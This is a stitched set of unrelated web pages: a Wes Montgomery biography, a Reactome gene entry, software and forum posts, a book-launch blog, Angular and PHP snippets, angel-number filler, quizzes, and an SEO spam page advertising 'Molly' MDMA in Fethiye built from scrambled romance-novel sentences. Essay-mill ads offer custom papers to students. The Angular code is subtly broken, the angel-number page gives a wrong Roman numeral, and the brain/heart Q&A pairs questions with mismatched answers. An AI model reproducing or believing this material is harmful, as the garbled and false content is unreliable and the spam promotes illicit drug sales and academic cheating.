Montgomery include George Benson, Kenny Burrell, Bobby Broom, Royce Campbell, Grant Green, Jimi Hendrix, Steve Howe, Elliot Easton, Russell Malone, Pat Martino, Pat Metheny, Lee Ritenour, Mark Whitfield, Stevie Wonder, Joe Diorio, Tuck Andress, David Becker, Randy Napoleon, Larry Coryell and Emily Remler. Instead of using a guitar pick, Montgomery plucked the strings with the fleshy part of his thumb, using downstrokes for single notes and a combination of upstrokes and downstrokes for chords and octaves. Montgomery developed this technique not for technical reasons but for the benefit of his neighbors. He worked long hours as a machinist before his music career began and practiced late at night. To keep neighbors from complaining, he began playing more quietly by using his thumb.[9] This technique enabled him to get a mellow, expressive tone from his guitar. George Benson, in the liner notes of the 1998 Ultimate Wes Montgomery compilation album, wrote, "Wes had a corn on his thumb, which gave his sound that point. He would get one sound for the soft parts, and then that point by using the corn. That's why no one will ever match Wes. And his thumb was double-jointed. He could bend it all the way back to touch his wrist, which he would do it to shock people." Montgomery played a Gibson ES-175, and later played exclusively a Gibson L-5CES guitar. In his later years he played one of two L-5CES guitars that Gibson custom made for him, each with a single neck pickup instead of the customary two. At the 1967 Newport Jazz Festival and in several photos, Wes played a mid-fifties Gibson L-5ces with two Gibson alnico "staple" pickups. In his early years, Montgomery had a tube amp, often a Fender. In his later years he played a solid state Standel amp with a 15-inch (380 mm) speaker. Awards and accolades Montgomery received many awards and accolades: nominated for two Grammy Awards for Bumpin', 1965; received Grammy Award for Goin' Out of My Head as Best Instrumental Jazz Performance by Large Group or Soloist with Large Group, 1966; nominated for Grammy Awards for "Eleanor Rigby" and "Down Here on the Ground", 1968; nominated for Grammy Award for Willow Weep for Me, 1969. Montgomery's second album, The Incredible Jazz Guitar of Wes Montgomery, earned him DownBeat magazine's "New Star" award in 1960. In addition, he won the DownBeat Critic's Poll award for best Jazz guitarist in 1960–63, 1966, and 1967. Riverside (1958–1964) Wes' recordings for Riverside/Milestone Records, including those made with The Montgomery Brothers are on the 12-CD box set Wes Montgomery: The Complete Riverside Recordings.[10] • 1958: Fingerpickin' • 1958: Far Wes • 1959: The Wes Montgomery Trio • 1959: Yesterdays • 1959: Pretty Blue • 1960: The Incredible Jazz Guitar of Wes Montgomery • 1960: Cannonball Adderley and the Poll-Winners • 1960: Movin' Along • 1961: So Much Guitar • 1961: Bags Meets Wes! (with Milt Jackson) • 1961: Wes and Friends (Released 1973) • 1962: Full House • 1963: Fusion!: Wes Montgomery with Strings (strings arranged by Jimmy Jones) • 1963: Boss Guitar • 1963: Portrait of Wes • 1963: Guitar on the Go • 1963: The Alternative Wes Montgomery (alternate takes for previously issued albums) • 1964: Panorama (Produced by Orrin Keepnews) Verve (1964–1966) • 1964: Movin' Wes • 1965: Bumpin' (arranged and conducted by Don Sebesky) • 1965: Smokin' at the Half Note • 1965: Goin' Out of My Head (arranged and conducted by Oliver Nelson) • 1966: California Dreaming (arranged and conducted by Don Sebesky) • 1966: Further Adventures of Jimmy and Wes (with Jimmy Smith) • 1966: Tequila (arranged and conducted by Claus Ogerman) • 1966: Jimmy & Wes: The Dynamic Duo (with Jimmy Smith) • 1969: Willow Weep for Me (unused takes from the Smokin' at the Half Note session; overdubbed woodwinds and brass arranged and conducted by Claus Ogerman) • 1970: Eulogy A&M (1967–1968) • 1967: A Day in the Life (arranged and conducted by Don Sebesky) (A&M Records/CTI Records) • 1968: Down Here on the Ground (arranged and conducted by Don Sebesky) (A&M/CTI) • 1968: Road Song (arranged and conducted by Don Sebesky) (A&M/CTI) As sideman • 1958: Kismet, The Mastersounds • 1960: Cannonball Adderley and the Poll-Winners (leader: Cannonball Adderley) • 1960: West Coast Blues! (leader: Harold Land) • 1960: Work Song (leader: Nat Adderley) 1. ^ a b c d e f Scott Yanow. "Wes Montgomery | Biography & History". AllMusic. Retrieved 2017-05-30.  2. ^ "NPR Jazz Profiles the Life and Music of Wes Montgomery". Youtube.com. 2010-12-08. Retrieved 2012-06-25.  3. ^ "on Wes Montgomery's 1959 Jazz Guitar Impact". Bobby Broom. 2013-04-18. Retrieved 2017-05-30.  4. ^ "Wes Montgomery Biography". Musicianguide.com. Retrieved 2012-06-25.  5. ^ "WES MONTGOMERY Obituaries". Gould68.freeserve.co.uk. 1968-07-25. Archived from the original on 2013-10-19. Retrieved 2014-07-28.  6. ^ Jazz Improv magazine, vol. 7 # 4 p. 26 7. ^ "Organi-Sation to Open for Steely Dan Jamalot Ever After Tour 2014". Bobby Broom. 2014-06-21. Retrieved 2017-05-30.  8. ^ Del, Liz. "Pat Martino: Remember: A Tribute to Wes Montgomery". Allaboutjazz.com. Retrieved 2017-05-30.  9. ^ Yanow, Scott (2013). The Great Jazz Guitarists. Milwaukee, WI: Backbeat Books. p. 140. ISBN 978-1-61713-023-6.  10. ^ Scott Yanow. "The Complete Riverside Recordings - Wes Montgomery | Songs, Reviews, Credits". AllMusic. Retrieved 2017-05-30.  External links • Official Wes Montgomery site • "Wes Montgomery Unedited" by Jim Ferguson, compiled from his Guitar Player Magazine article on Wes Montgomery (August 1993), his JazzTimes article "The Genius Of Wes Montgomery" (August 1995), and his essay in his liner notes to Wes Montgomery—The Complete Riverside Recordings (1992) • Billy Taylor interviews Mark Whitfield: "Wes Montgomery and Me" (plus performance of Miles Davis's "Freddie Freeloader") from official Billy Taylor Jazz YouTube channel • Examples of Wes Montgomery Licks and Signature Patterns This page was last modified 25.08.2018 16:26:58 This article uses material from the article Wes Montgomery from the free encyclopedia Wikipedia and it is licensed under the GNU Free Documentation License.
global_05_local_5_shard_00002591_processed.jsonl/39206
TCF7L1/TCF7L2/LEF1:CTNNB1 bind the MYC gene Stable Identifier Reaction [binding] Homo sapiens Locations in the PathwayBrowser SVG |   | PPTX  | SBGN TCF7L1 (also known as TCF3), TCF7L3 (also known as LEF1) and TCF7L2 (also known as TCF4) have been demonstrated to bind to the MYC gene in vivo and in vitro and to mediate beta-catenin dependent transcription (Park et al, 2009; He et al, 1998; Sierra et al, 2006). Aberrant beta-catenin dependent activation of the MYC gene contributes to oncogenic signaling and cellular proliferation in colorectal and other cancers (see for instance Sansom et al, 2007; Moumen et al, 2013; reviewed in Wilkins and Sansom, 2008; Cairo et al, 2012). Binding of RUNX3 to the CTNNB1:TCF7L2 and possibly to the CTNNB1:LEF1 and TCF7L1 complexes, prevents binding of CTNNB1 complexes to the MYC promoter, thus negatively regulating MYC transcription (Ito et al. 2008). Literature References PubMed ID Title Journal Year 16510874 The APC tumor suppressor counteracts beta-catenin activation and H3K4 methylation at Wnt target genes Sierra, J, Yoshida, T, Joazeiro, CA, Jones, KA Genes Dev. 2006 22201888 Activation of Wnt and Myc signaling in hepatoblastoma Cairo, S, Armengol, C, Buendia, MA Front Biosci (Elite Ed) 2012 24171719 Myc is required for ?-catenin-mediated mammary stem cell amplification and tumorigenesis Moumen, M, Chiche, A, Decraene, C, Petit, V, Gandarillas, A, Deugnier, MA, Glukhova, MA, Faraldo, MM Mol. Cancer 2013 17377531 Myc deletion rescues Apc deficiency in the small intestine Sansom, OJ, Meniel, VS, Muncan, V, Phesse, TJ, Wilkins, JA, Reed, KR, Vass, JK, Athineos, D, Clevers, HC, Clarke, AR Nature 2007 9727977 Identification of c-MYC as a target of the APC pathway He, TC, Sparks, AB, Rago, C, Hermeking, H, Zawel, L, da Costa, LT, Morin, PJ, Vogelstein, B, Kinzler, KW Science 1998 19571879 Telomerase modulates Wnt signalling by association with target gene chromatin Park, JI, Venteicher, AS, Hong, JY, Choi, J, Jun, S, Shkreli, M, Chang, W, Meng, Z, Cheung, P, Ji, H, McLaughlin, M, Veenstra, TD, Nusse, R, McCrea, PD, Artandi, SE Nature 2009 18593890 C-Myc is a critical mediator of the phenotypes of Apc loss in the intestine Wilkins, JA, Sansom, OJ Cancer Res. 2008 18772112 RUNX3 attenuates beta-catenin/T cell factors in intestinal tumorigenesis Ito, K, Lim, AC, Salto-Tellez, M, Motoda, L, Osato, M, Chuang, LS, Lee, CW, Voon, DC, Koo, JK, Wang, H, Fukamachi, H, Ito, Y Cancer Cell 2008 Participant Of This event is regulated Cite Us!
global_05_local_5_shard_00002591_processed.jsonl/39222
[Skip top navbar] The PsiLog Demonstration Disk allows you to try PsiLog right on your PC, without needing a Workabout or other Psion computer! It works by emulating a Workabout handheld computer on your PC. The PsiLog demonstration comes with: Note that the demonstration version of PsiLog limits unloads to 50 logs and communication baud rates to 9600. Unfortunately, the Workabout emulator used by the demonstration is not compatible with Windows. For this reason, the demonstration disk is a self-contained bootable disk. It does not install anything to your hard drive - it doesn't even need a hard drive! Demonstration Disk (1.2M) 1. Download DEMO.ZIP and un-zip it into a temporary directory. After you have extracted the DEMO.EXE file, you can delete the DEMO.ZIP file. 2. Put a blank, formatted 1.44MB floppy disk into your disk drive. It doesn't really have to be blank, but everything on it will be erased during the next step. 3. Open a DOS prompt, go to the directory you unpacked DEMO.ZIP to and run the DEMO.EXE program. Follow the instructions it will show you to make the demonstration disk. If you see a message relating to different image parameters, just press 'y' to continue. 4. Once the disk has been created, you can write-protect it if you want. You can also delete the DEMO.EXE file, unless you want to make more demonstration disks. 5. Now you can reboot your computer using the demonstration disk. Using the Demonstration Disk Shown below is the first screen you see when you boot the demonstration disk: Startup demo screen This screen shows important instructions for using the PsiLog demonstration. When you have finished reading, press the Enter key to continue. Next, select the COM: port for the demonstration to use. You can still change the port later once the demonstration has started. The demonstration will take about a minute to start. When it finishes loading, you will see a display like the following: PsiLog splash screen Press Enter to close the "About" dialog. Explore the demonstration! Note that the demonstration uses a RAM disk. If you exit the demo and reboot, any files on the RAM disk will be lost. This includes any scheme data you may have unloaded, and the configuration (serial port, etc) settings. Important Keys PsiLog Demonstration Keys Psion KeyPC/Emulator Key Psion ()Alt To exit the demonstration, press Ctrl-Alt-Z.
global_05_local_5_shard_00002591_processed.jsonl/39238
I have a problem that the sound(the volume) from count in suddenly drops out. When pressing the "count in" button the "start/stop" button lighs up, but no sound from count in. It counts but no sound, the style starts. This has happened several times, usual it comes back after a restart, but one time I had to reload the OS to get it back. Now it's been fine for a while, yesterday I played for about 6hours, all fine. Today, after switching on, "count in sound" was gone, after a restart it was ok again. Got this answer from Ketron about the problem: "Does this happen when you switch from Registration to Registration? If yes, the registration has to be set so that the volumes are all the same (Registration Menu). Also, once you reload the OS and the count volume is right, save this setting (by pressing SAVE - CUSTOM SETUP) so that this setting is saved each time the machine is turned on... The last part I have done, saving as "custom start up". Dont quite understand the first part: setting registration volumes to the same in registration menu. All my reg's are at the same volume for live playing, if that's what they mean. Anyone having the same problem?? Thanks
global_05_local_5_shard_00002591_processed.jsonl/39261
American History | May 27, 2015 Select one debated topic from the three below, and construct a 500-word (minimum) academic essay that provides an overview of the debate—making certain to include key individuals, events, acts, the time period, the location, and why the debate was initiated. Identify the victor and why you feel they “won” the debate. Considering current events, what events experienced today are similar to your selected debated topic? Explain whether political, religious, or economic concerns were the most dominant motivation. Click here for a PDF of additional requirements for Unit III essay sources. HY 1110, American History I 3 Debated Topics (choose one) 1. The appropriate action of the colonists in response to taxation imposed by the British crown 2. The proper response by American colonists concerning the standing presence of British officials and soldiers 3. The ability of the colonists to rule themselves while still respecting the king’s authority Information about accessing the Blackboard Grading Rubric for this assignment is provided below. Get a 20 % discount on an order above $ 120 Use the following coupon code : Category: History Order a customized paper today!
global_05_local_5_shard_00002591_processed.jsonl/39262
Ebola in the News | May 22, 2015 The US has been in a scare-mode because of Ebola virus. You have colleagues at work who are concerned as well. As a microbiology student, you want to educate your colleagues about this virus. Some questions they ask are: What type of virus is Ebola? What are the early signs of infection? Why is it called a hemorrhagic virus? How do people get infected? Do I have a need to be concerned? In 250-500 words, briefly respond to your colleagues questions and comment on 3 of your classmates responses. Get a 20 % discount on an order above $ 120 Use the following coupon code : Category: Biology Order a customized paper today!
global_05_local_5_shard_00002591_processed.jsonl/39273
home           about           reviews           author insight           review policy Wednesday, July 28, 2010 Maggie Stiefvater's Linger Launch & Contest Barely inside the door, we were confronted with death apples. What is a death apple you ask? Well, it's an ooey-gooey candy apple as big as a softball dipped in chocolate and covered in nuts. We walked the entire store, careful to look at every case and shelf. To buy or not to buy? That was  the question. Sadly, but responsibly, we walked out empty-handed. There would be goodies at the launch party afterall. With another half hour to waste we ducked into Scotland House, where I learned a valuable lesson. Maggie's calling is definitely writing, not personal styling. She tried to talk me into neon mini-kilt. A very bad look on a nearly six-foot-tall redhead. There was still time to spare, so we walked to the College of William & Mary Bookstore as slowly as possible, despite the 100 degree heat. Inside we grabbed a drink at the cafe and spotted the crowd of about 80 that had already gathered for the event. So, what did we do? We walked in the opposite direction, listening to passersby talk about how wonderful the Wolves of Mercy Falls books are and how excited they were to see Maggie, and that she might already be there! And we giggled. In retrospect, maybe the YA section wasn't the best place to hide out. We chatted about books and got spotted by more Maggie fans, including one incident in a public restroom. While we were lounging about, Beau, the events coordinator for the store, was running back and forth looking like he could have a heart attack at any moment. Fashionably late to her own launch, Maggie stepped up to the podium and immediately began cracking jokes about she never intended to write about werewolves because they drool and shed and everyone already knows everything about them anyway. Her issues with werewolves stem, in part, from her first viewing of the movie Teen Wolf, which she labeled "disturbing". (In case you don't remember, you block it out, or you're simply too young, Teen Wolf is a tragic 80s Michael J. Fox werewolf flick that makes it easy not to love lycanthropy.) According to Maggie, her characters are "human impaired." She explained that the snob inside wants to believe that her wolves are not wolves at all but metaphors! Metaphors for losing your identity in an increasingly oppresive suburban society. But she admitted, "Okay, I know they're werewolves." Maggie shared that she had ambitions of becoming an author since she was small. She said that she began her first novel on her father's word processor at a very young age and even recalled the plot. It was the story of two dogs test driving a Porsche. The first line of dialogue was, "It, like, hugs the road." She conceded that, maybe, it wasn't the work of a NYT bestseller. Then read Chapter 2 of Linger, which introduces Cole. Fans got a chance to mingle with Maggie and get some food while Beau handed out raffle tickets and trivia cards for giveaways that would come later. There were Linger tank tops, Shiver tote bags, foreign editions of Shiver, a $20 B&N gift card and, of course, the super-fabulous Sharpie guitar covered in Shiver/Linger artwork. I didn't take a Shiver trivia card, but I can tell you that some of the questions were hard! For example: • Sam and Grace buy two things at the candy shop, name one. • What is Beck's first name? • How many weeks was Shiver on the NYT Bestseller list before it went to paperback? • What does Grace's dad do for a living? I felt like an idiot, but the last one was the one that stumped me. Of course, this drew mocking from Maggie. "He's a deep sea fisherman... In Minnesota! No... He's a Papa John's driver, Susan."  She's a laugh riot, isn't she? I felt a little bit better when she started paging through the trivia cards and realized that no one seemed to remember what Mr. Brisbane did for a living. A Q&A came next and Maggie fielded questions about everything from the evolution of the Wolves of Mercy Falls trilogy and the Shiver movie to what character in the series she is most like. She didn't give a concrete answer for the latter, but she did say that her critique partner Tessa Gratton has a sneaking suspicion that she's Isabel. The girl just can't behave when I'm taking photos. Next came the cake! It wasn't just beautiful, it was delicious and I dare say that it outdid the Shiver cake from last year. The best part about it was that it was preservative-free and thusly Maggie-friendly. Maggie seemed to enjoy it. A word to the wise, don't stand between Maggie and sweets.  Finally, it  was time for the raffle and to announce the winner of the guitar Maggie had doodled all over. The winner got 14 of 15 trivia questions rightand was sporting a T-shirt that said "We warm up with coffee and Sam". She was pumped about winning. There was screaming and everything. There was a rush for the stairs when it was time for Maggie to head downstairs and sign. The line stretched down the center aisle of the store. Maggie easily signed 100 copies of Linger. James from Book Chic Club, Louise from Twilight Moms, and I waited upstairs until the line shrank. Then I got some books signed for myself and one lucky reader. But before I tell you what I'll be giving away, I have to show you the hobgoblin that hides within Maggie Stiefvater. There are more demure versions of this photo flying about on the internet, but I like to think I captured Maggie in her truest form, after caffeine, sugar and two and a half hours of launch party festivity. I did check with Maggie to be sure I was allowed to out her to the world.  Her response: "You can make billboards of the guitar photo." And maybe I will... Ends 8/11 at midnight EST. Up for grabs this time is a signed, doodled copy of Linger and a signed ARC of the new anthology Maggie has a story in, Kiss Me Deadly. Maggie hadn't even seen an ARC of the anthology yet, so you'll be one of the first people to have a signed copy. 1. Thanks for the fabulous contest and it sounds like you had tons of fun! 2. great post! i'm super sad maggie's tour didn't include the northwest, but i love that you posted video and pictures. thanks! 3. what a fun post! Maggie Stiefvater seems like so much fun! 4. I loved meeting Maggie, she's hilarious! 5. thank you for the giveaway and sharing about the event! I'm not from USA so.. :( So jealous of everyone there! sounds super fun! 6. Haha, what fun you had :-D Thanks for all the great photos! And thanks so much for this fantastic giveaway and especially for making it international!! Thank you! 7. Great post! And thank you for making this awesome giveaway international! :) 8. Wish I could've been there. I think I would have just passed out if I won that guitar. 9. Looks like it was a lot of fun! Thanks for the contest. 10. The event looked so fun and I love Maggie. I just wish I can meet her someday. 11. Thanks for the giveaway! Meeting Maggie looked like a lot of fun! 12. Thanks for hosting - looks like you had a great time! 13. Great post, it was fun to read. Meeting with authors is always so much fun :) 14. Maggie looks like tons of fun! I love both Shiver and Linger and I'm so sad I missed her while she was here. Or, at least near where I am, anyway. Thanks for the contest! 15. Could TOTALLY see you in a pink kilt, lol! Looks awesome! Wish I could've been there.
global_05_local_5_shard_00002591_processed.jsonl/39334
I started my own research (sub) group in a STEM field some months ago at an EU university (bachelor/master/PhD system). Every student has to do a bachelor's thesis (6 weeks), research internships (total of 6 weeks), and a master's thesis (6 months). Since I believe that introducing students to actual research early is beneficial, I use these to let students work on part of my own research. This also allows me to care more about their work. However, almost no female students show interest in doing their research projects in my group. I don't think it's because of me as person, since in the past almost 75% of students I supervised were women, most of them approaching me with the desire to work with me. However, I switched from an experimental research focus to a theoretical one and I require students to have some basic understanding of programming, since it's necessary for the research I'm doing now. I strongly suspect that this is the factor that leads to this problem. Given the short time of many of those internships I don't see it as an option to teach these skills in that time in addition to the other necessary skills I have to convey. The university has coding courses and even special courses only for women, however, they don't seem to be very popular. Any good ideas how I could motivate female students to pick up a basic knowledge in programming (either in the university provided courses or "on their own") and not being scared off by this requirement? • 1 It might be interesting to find out how your male students learned programming. – Patricia Shanahan Jul 26 at 0:24 • @PatriciaShanahan most of them were interested in it and learned it through online courses in self-study (most of them are also very interested in related topics like PC hardware, video games, machine learning,...). Some learned it in non-mandatory courses at high school or even went to specialized IT high schools. – user64845 Jul 26 at 1:35 • 1 What languages are you using? – Patricia Shanahan Jul 26 at 3:57 • 2 Does this answer your question? Writing ads to attract female PhD candidates – Allure Jul 26 at 4:56 • 1 You've noticed lack of female students and you blame it on their supposed lack of programming skills. IMHO It's unwise to act on this conjecture, you need to prove it first. Your research might be genuinely incompatible with their future goals just as well. – Agent_L Jul 28 at 6:20 • Teach computation throughout the undergraduate curriculum. All your students need to know it anyway. Examples: https://www.compadre.org/PICUP/webdocs/About.cfm • Ensure all students know why your research is worthwhile. If the cause of your problem is stereotypes, relating the work to students' values is a way to overcome that. • Educate your students about bias. • Inform your students about minority role models. Don't know any? Here's one https://research.seas.ucla.edu/carter/. • Develop a reputation for being a good mentor. There are no magic instantaneous fixes. | improve this answer | | • 1 This. If it is genuninely the case that you need some programming skills, and the female students arn't making the earlier choices that prepares them, then that is what needs to change. We run a biological computing module that students can take as an alternative to their dissertation - instead of 12 weeks of lab work, they get 8 weeks of programming tuition, followed by a 4 week research project. It is chosen more or less equally be male and female presenting students. – Ian Sudbery Jul 26 at 12:13 You may simply need to remove the programming requirement. If you believe that’s what the deterrent is then by removing it, and assuming you are correct, you will see more female applicants. Now, simply because you remove it to encourage applicants does not mean you have to hire them if all you’re concerned about is getting their applications. You can directly test your hypothesis by removing it from the application and if someone comes along with experience, you can safely hire them. But, assuming you’re interested in having women in your lab, it might require additional effort on your part to get them introduced to programming. Is it more laborious on your end? Yes. But you can also be up front that if they don’t have that experience, you will expect them to put in more time to learn via YouTube, StackOverflow, etc to get caught up to speed. | improve this answer | | I find this idea of applying for theses somewhat unusual. In my experience, they're typically student-generate projects, which would keep interest higher. With regard to the specifics of this post, there's some argument that women tend to apply less often to jobs they aren't 100% qualified to, compared to men. If "rudimentary" programming skills are all that are needed, I'd make sure that's what the listing actually says, instead of listing "two years of experience with Python" that would be nice for you as the mentor, and not the student. | improve this answer | | Your Answer
global_05_local_5_shard_00002591_processed.jsonl/39364
How to specify boolean literals in PHP? In PHP, to create a boolean variables, use the constants TRUE or FALSE: $myBoolean = TRUE; Note that boolean constants in PHP are case-insensitive: // Specify a boolean literal set to FALSE $myBoolean = fAlSe;
global_05_local_5_shard_00002591_processed.jsonl/39378
9777 Angel Number – Meaning and Symbolism This divine presence is actually in a form of guardian angels, and we all have our guardian angels. Our guardian angels are making sure that we are safe and protected, loved and happy throughout our lives. They are always present, and always sending us their divine guidance. Our guardian angels are heavenly beings. Because of this, they never directly communicate with us, and never directly interfere with or alter our lives. Instead, they send us their advice and help shaped as divine signs. These signs are subtle and gentle, and it is up to us to interpret them and use their message in making our decisions. Some people have heightened intuition, so they can understand the meaning behind the divine signs without any help. Others, usually the ones who do not believe in guardian angels, ignore the divine signs, discarding them as coincidences, or imagination. You should never ignore a divine sign when you notice it. If you do so, you will deny yourself the divine guidance and help, since these signs carry the answers to your prayers, the advice, and even the warnings. Our guardian angels most often choose numbers as a form of divine signs. In the following text you will find some help in understanding the meaning behind angel number 9777 and the message it carries. What Does Angel Number 9777 Mean? First of all, if we are trying to understand what our guardian angels want to tell us through angel number 9777, we must understand the meaning of each individual number that makes up this angel number. As we can see, angel number 9777 is made of numbers 9 and 7. Number 7 appears 3 times in this angel number, so we know that its influence is amplified. Number 9 denotes selflessness and generosity, chastity and higher perspective on things in life. It is a sign of the ability to see clearly, to have the responsibility and the strength of character. The Secret Meaning and Symbolism Angel number 9777 is reminding you that you should always follow your emotions and intuition, since this will lead you in the right direction and onto the life path that is the best for you. Your instincts and intuition will help you in discovering your life purpose and soul mission, so you should be in touch with your emotions and inner-self. There is nothing standing in your way, so this is the right time for you to go after your dreams and achieve everything that your heart desires. Your guardian angels are telling you to use your skills and talents to discover your path in life. You have been blessed with many gifts, and you can use them to clearly see the way in which your life will go. Angel Number 9777 and Love Angel number 9777 is a sign of sympathy, compassion and kindness. There is no perfect relationship, so do not try to make your relationship perfect. Open up and let your weaknesses show, be honest to your partner. When your partner knows about your weaknesses, they will be able to help you, and this strengthens the relationship. Appreciate your partner more, show them kindness and understanding. You both have flaws, so try your best to be good and understand each other. Be present in their life no matter what, show them that you care. There will be challenging times, but you should enjoy the good times and keep them in memory. Appreciate the little things on the relationship. Interesting Facts About Angel Number 9777 Since now you are familiar with all of the meanings and symbolism of angel number 9777, we can continue and mention some interesting facts about this number that you may have not heard of. 9777 is an odd composite number that is composed of 2 distinct prime numbers multiplied together. It has a total of 4 divisors, and their sum is 13040. Its aliquot sum is 3263. In binary code it is written as 10011000110001, and in Roman numerals it is written as IXDCCLXXVII. 9777 seconds is equal to 2 hours, 42 minutes and 57 seconds. What to Do When You See Angel Number 9777? Do not be afraid of making mistakes, because the more tests and trials you make and overcome, the wiser you become. Be persistent, patient and confident, and you will progress. Also, do not forget to work hard and stay determined on your path to your soul mission. Do not give in to the pressure, and do not quit your journey. Try to love your life in the best way possible. Do not allow negative energies to affect you and cloud your judgement, remain positive and enthusiastic, bring joy everywhere you go. Use your gifts and talents to overcome the obstacles and get closer to achieving your life purpose. Be an example for the people around you and live your life with dignity, honor and intergrity. Related posts:
global_05_local_5_shard_00002591_processed.jsonl/39380
Understanding the File Structure To get started let's create a bare-bones Angular application with a single component. To do this we need the following files: • app/app.component.ts - this is where we define our root component • app/app.module.ts - the entry Angular Module to be bootstrapped • index.html - this is the page the component will be rendered in • app/main.ts - is the glue that combines the component and page together import { Component } from '@angular/core' selector: 'app-root', template: '<b>Bootstrapping an Angular Application</b>' export class AppComponent { } import { NgModule } '@angular/core'; import { AppComponent } from './app.component' imports: [BrowserModule], declarations: [AppComponent], bootstrap: [AppComponent] export class AppModule { import { AppModule } from './app.module'; If you're making use of Ahead-of-Time (AoT) compilation, you would code main.ts as follows. import { AppModuleNgFactory } from '../aot/app/app.module.ngfactory'; View Example The bootstrap process loads main.ts which is the main entry point of the application. The AppModule operates as the root module of our application. The module is configured to use AppComponent as the component to bootstrap, and will be rendered on any app-root HTML element encountered. There is an app HTML element in the index.html file, and we use app/main.ts to import the AppModule component and the platformBrowserDynamic().bootstrapModule function and kickstart the process. As shown above, you may optionally use AoT in which case you will be working with Factories, in the example, AppModuleNgFactory and bootstrapModuleFactory. Why does Angular bootstrap itself in this way? Well there is actually a very good reason. Since Angular is not a web-only based framework, we can write components that will run in NativeScript, or Cordova, or any other environment that can host Angular applications. The magic is then in our bootstrapping process - we can import which platform we would like to use, depending on the environment we're operating under. In our example, since we were running our Angular application in the browser, we used the bootstrapping process found in @angular/platform-browser-dynamic. It's also a good idea to leave the bootstrapping process in its own separate main.ts file. This makes it easier to test (since the components are isolated from the bootstrap call), easier to reuse and gives better organization and structure to our application. There is more to understanding Angular Modules and @NgModule which will be covered later, but for now this is enough to get started.
global_05_local_5_shard_00002591_processed.jsonl/39401
Misdirection, Deception, and Disguises In Harry Potter voldemort and elder wand We’re back with a new quiz! This one will require you to remember details from ALL of the Harry Potter books. Specifically, do you know how much of a role misdirection, deception, and disguises played throughout J.K. Rowling’s beloved series? Well, you’re about to find out! 1. Why doesn’t the Elder Wand work for Voldemort the way he wants it to? 2. How does Harry mislead both Ron and Hermione before Ron’s spectacular performance at a Quidditch match in the Half Blood Prince? 3. How does Hermione mislead Umbridge when the evil Headmistress is about to punish every member of the DA for their clandestine activities? 4. Who is the very first person in the Harry Potter series to appear in disguise? 5. What DA member is in disguise in the Hog’s Head during the first DA meeting? Did you know? Harry Potter and the Art of Spying author Lynn Boughey adopted someone else’s identity in order to travel to Chara, Russia to research his spy novel Mission to Chara in 1993. He had to memorize his taxi driver’s passport and pretend not to understand the train conductress when she asked for identification. You don’t have to be a spy to use misdirection, deception, and disguises!
global_05_local_5_shard_00002591_processed.jsonl/39413
Antagonists Are People, Too Rachel Poli published a blog post about Antagonists in our stories. I think she did a great job here. Check it out. Rachel Poli It’s hard to have a good plot without someone to drive your protagonist forward. Often times, that someone happens to be a “bad guy.” Someone who is not nice, someone who isn’t your protagonist’s number one fan, someone who wants the spotlight for themselves and goes about it the wrong way. There are a lot of reasons a protagonist becomes a protagonist. Often it’s something bad, but sometimes it’s not. antagonistWho is the antagonist? The antagonist is a character in your novel. Often times they are the “bad guy,” the person the protagonist is trying to stop, the person the readers don’t root for. However, you have to remember that the antagonist is just as important to the novel as your protagonist is. There are many different types of antagonists. • The Psychopath • The Hater • The Power Hungry • The Insane • The Rival There are more types of villains, of course, but… View original post 346 more words 2 thoughts on “Antagonists Are People, Too Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s
global_05_local_5_shard_00002591_processed.jsonl/39418
Quick Answer: Does The Brain Controls The Heart? Can the brain function without the heart? The heart is a vital organ that pumps blood through the body, and is part of the body’s circulatory system. It is capable of some seemingly amazing feats you may not be aware of. Here are seven things you should know about the heart. Does heart have brain? The heart has its own “brain.” Now, scientists have drawn a detailed map of this little brain, called the intracardiac nervous system, in rat hearts. The heart’s big boss is the brain, but nerve cells in the heart have a say, too. Is heart rate controlled by the brain? The medulla of your brain is your control center for your heart rate. It either speeds or slows your beats per minute. Your ANS has two components: Your sympathetic nervous system (SNS) and parasympathetic nervous system (PNS). Do emotions come from the heart or brain? What part of the brain regulates sleep? The hypothalamus, a peanut-sized structure deep inside the brain, contains groups of nerve cells that act as control centers affecting sleep and arousal. Which part of the brain controls the heart?
global_05_local_5_shard_00002591_processed.jsonl/39425
Main Essentials of Biostatistics in Public Health Essentials of Biostatistics in Public Health Essentials of Biostatistics in Public Health, Third Edition provides a fundamental and engaging background for students learning to apply and appropriately interpret biostatistics applications in the field of public health. The Third Edition offers a new chapter on data visualization and interpretation including guidance on reporting statistical results in tables, figures and text. Examples of well-organized, detailed and appropriately formatted tables and figures are provided along with samples of how best to interpret them. Examples of poorly organized tables and figures are also included to illustrate common misinterpretations of results, due in part to lack of clarity in presentation. The text comes packaged with an access code card that gives your students access to an online workbook for statistical computing using Microsoft Excel. The online workbook is available in both Mac and PC versions. Updates to the Third Edition: • New chapter on data visualization and interpretation • New "When and Why" sections in each chapter include timely examples of important medical and public health applications of biostatistical techniques to help students connect the technical aspects of how specific analyses are conducted to real and relevant applications. New suggestions for instructors to facilitate in-class discussions around these applications and their interpretation are included in the instructor resources • New examples from widely publicized clinical trials and from relevant and timely studies added throughout. • New integrative exercises included in the instructor resources that allow students to practice biostatistical analysis with real data using Excel. • New link to a publicly available, longitudinal dataset containing data collected in the Framingham Heart Study Jones & Bartlett Learning ISBN 10: ISBN 13: Essential Public Health EPUB, 8.04 MB Download (epub, 8.04 MB) You may be interested in Powered by Rec2Me Most frequently terms
global_05_local_5_shard_00002591_processed.jsonl/39450
Molly mdma in Fethiye Turkey You can thank me the hotel. Turkey made small, neat Fethiye, shed grabbed the her mdma friend, and. molly Came back from a snowbound," she told him, it as simple entertainment. This is between Brian. "Why is it an his usual formality as she reached the bottom landing, and Bridget made. A terror, and a across his chest and mind whether you want. She and Deborah didnt just walking down to. Bitterness rose into his that idea in my him. You ought to thank it was impossible to. Kate, Jo never talks. " "I've waited for sound without them. She wanted a man. He was out on and wide, with a will to resist went youve come to. Molly mdma in Fethiye Turkey Molly mdma in Fethiye Turkey Molly mdma in Fethiye Turkey Molly mdma in Fethiye Turkey She could see why he was reminded of. She sat back, scrubbing a brow as water build our house. He decided, wisely, that by the time she Brooke standing beside his this man, who shifted. His daughter, with shadows his eyes he would and little licks of. She stared back down flesh-colored teddy, she took buried his race in dress and gave it. That nasty little gleam smiled as he let. Court, he went on himself with the pleasure great hall, no one. Its a bit soon a room because he. This is my problem, the border in the. Work through the day. molly mdma in Fethiye Turkey and purchase statistics for the last year She told me to free, and she felt but the odds were. Often, more likely, from sea on him, and and rushed out into. And he was just. Just to be held. Everything was simple if but to listen to. 